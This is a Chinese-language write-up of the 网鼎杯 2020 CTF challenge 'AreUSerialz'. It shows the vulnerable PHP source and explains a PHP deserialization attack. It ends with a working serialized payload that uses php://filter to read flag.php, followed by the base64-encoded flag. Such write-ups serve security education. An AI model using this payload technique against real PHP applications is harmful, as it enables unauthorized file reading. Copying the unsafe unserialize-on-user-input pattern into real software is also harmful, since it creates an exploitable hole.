[网鼎杯 2020 青龙组]AreUSerialz

题目：

给了一个代码审计部分：

 process();
    }

    public function process() {
        if($this->op == "1") {
            $this->write();
        } else if($this->op == "2") {
            $res = $this->read();
            $this->output($res);
        } else {
            $this->output("Bad Hacker!");
        }
    }

    private function write() {
        if(isset($this->filename) && isset($this->content)) {
            if(strlen((string)$this->content) > 100) {
                $this->output("Too long!");
                die();
            }
            $res = file_put_contents($this->filename, $this->content);
            if($res) $this->output("Successful!");
            else $this->output("Failed!");
        } else {
            $this->output("Failed!");
        }
    }

    private function read() {
        $res = "";
        if(isset($this->filename)) {
            $res = file_get_contents($this->filename);
        }
        return $res;
    }

    private function output($s) {
        echo "[Result]: 
";
        echo $s;
    }

    function __destruct() {
        if($this->op === "2")
            $this->op = "1";
        $this->content = "";
        $this->process();
    }

}

function is_valid($s) {
    for($i = 0; $i < strlen($s); $i++)
        if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))
            return false;
    return true;
}

if(isset($_GET{'str'})) {

    $str = (string)$_GET['str'];
    if(is_valid($str)) {
        $obj = unserialize($str);
    }

}

首先这个题目给出的是AreUSerialz，所以一看就知道跟序列化有关的。

代码分析：

1.类之外的函数

本人喜欢先看类之外的函数，因为类太繁杂而且主要第一步运行的不就是类外函数吗？

这里可以看出我们传入了一个str参数，用url?str=进行传参
然后调用了is_valid函数，

is_valid函数说明了我们字符串str里面所有字符必须是ascill码中32到125之间的字符

有需要的大家就自己找吧ascii字符表

然后就会调用反序列化函数unseralize();

2.类及其类内函数

上面的construct会调用process函数，然后这些函数会按顺序执行，执行哪些参考op参数

相关知识点：

1.魔术方法；

php代码中的类，如果函数是以下划线_开头的，就是会自动调用的函数

如本题中的


这些都是会自动调用的，所以你就会知道为什么他只是调用了反序列化，但是为什么还能执行类里面的函数，因为自动调用了construct，然后construct里面调用了process函数

2.类的封装的序列化

protected/private类型的属性序列化后产生不可打印字符，public类型则不会。

所以本题里面有个is_valid()，如果你序列化时用的是protected，或者private的话，你生成的序列化会出现一些乱码，就是不可打印的字符串

3.PHP版本问题

PHP7.1+对类的属性类型不敏感。

所以可以把protected改为public

解题路线：

首先一看我们需要传入一个str的字符串，然后这些字符里面不能出现ascii码32到125之外的字符

然后我们自动调用了构造函数construct，因为构造函数的写法是_construct,所以生成的时候会自动调用

然后construct函数里面调用了process函数

这里会有三个分支，但是我们大胆猜测第二个才是我们要的，其实也能一个一个看，但是我懒得写了。我给出的理由是，第一它读，我猜他读的是文件地址，输出是输出我们所需要的文件，所以这部分是我们需要利用的

可以看到file_get_contents()，这不是很容易想到伪文件读取协议吗

然后我们将读取的文件输出出来

实际解题方式：

1.构造序列化

刚说了protected和private连个会产生不可打印字符，我们试一下，刚才逻辑下来我们已知我们op参数要为2，并且filename那里可以用伪文件读取协议

我这里不知道为什么没显示出来，但是确实会出现不可输出的符号

然后我们转用public

构造序列化的代码如下：

O:11:"FileHandler":3:{s:2:"op";i:2;s:8:"filename";s:57:"php://filter/read=convert.base64-encode/resource=flag.php";s:7:"content";N;} 

然后我们将序列化后的作为str的参数传进去就可以获得一串base64编码后的flag

2.传参

PD9waHAgJGZsYWc9J2ZsYWd7NDdjNjQ1MmUtNGUyMi00ODMzLTk0ZDUtYmYwNTI4ZmFiYzhmfSc7Cg==

3.base64解码

然后就可以提交flag了

---